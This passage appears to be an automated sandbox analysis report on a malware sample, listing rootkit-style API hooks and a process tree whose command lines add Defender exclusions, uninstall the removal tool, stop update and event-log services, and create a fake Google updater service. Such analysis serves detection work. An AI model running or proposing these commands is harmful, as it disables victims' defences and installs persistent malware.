ZwEnumerateValueKey             INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation        INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                  INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation   INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx          INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey             INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx          INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile            INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF
Function Name                   Hook Type   New Data
ZwEnumerateKey                  INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation        INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                  INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile           INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile           INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                  INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile            INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey             INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation        INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                  INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation   INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx          INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey             INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx          INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile            INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                            Target ID:0
                                                            Start time:04:36:58
                                                            Start date:05/11/2024
                                                            Path:C:\Users\user\Desktop\file.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0x7ff6cc420000
                                                            File size:5'511'168 bytes
                                                            MD5 hash:FB788C569D7B0ACF5546340AA85CD0A6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:04:36:59
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:04:36:59
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff767cb0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\wusa.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff62b220000
                                                            File size:345'088 bytes
                                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:04:37:04
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:04:37:04
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dialer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\dialer.exe
                                                            Imagebase:0x7ff691a50000
                                                            File size:39'936 bytes
                                                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:04:37:04
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:04:37:04
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:28
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:29
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff70f330000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:30
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\winlogon.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:winlogon.exe
                                                            Imagebase:0x7ff7cd660000
                                                            File size:906'240 bytes
                                                            MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:31
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:32
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:33
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:34
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:35
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\ProgramData\Google\Chrome\updater.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                            Imagebase:0x7ff671c90000
                                                            File size:5'511'168 bytes
                                                            MD5 hash:FB788C569D7B0ACF5546340AA85CD0A6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 50%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:36
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\lsass.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\lsass.exe
                                                            Imagebase:0x7ff7a2ae0000
                                                            File size:59'456 bytes
                                                            MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:37
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:38
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:39
                                                            Start time:04:37:06
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:40
                                                            Start time:04:37:06
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dwm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"dwm.exe"
                                                            Imagebase:0x7ff74e710000
                                                            File size:94'720 bytes
                                                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:41
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff767cb0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:42
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:43
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:44
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:45
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\wusa.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff62b220000
                                                            File size:345'088 bytes
                                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:46
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:47
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:48
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:49
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:50
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:51
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:52
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:53
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:54
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:55
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
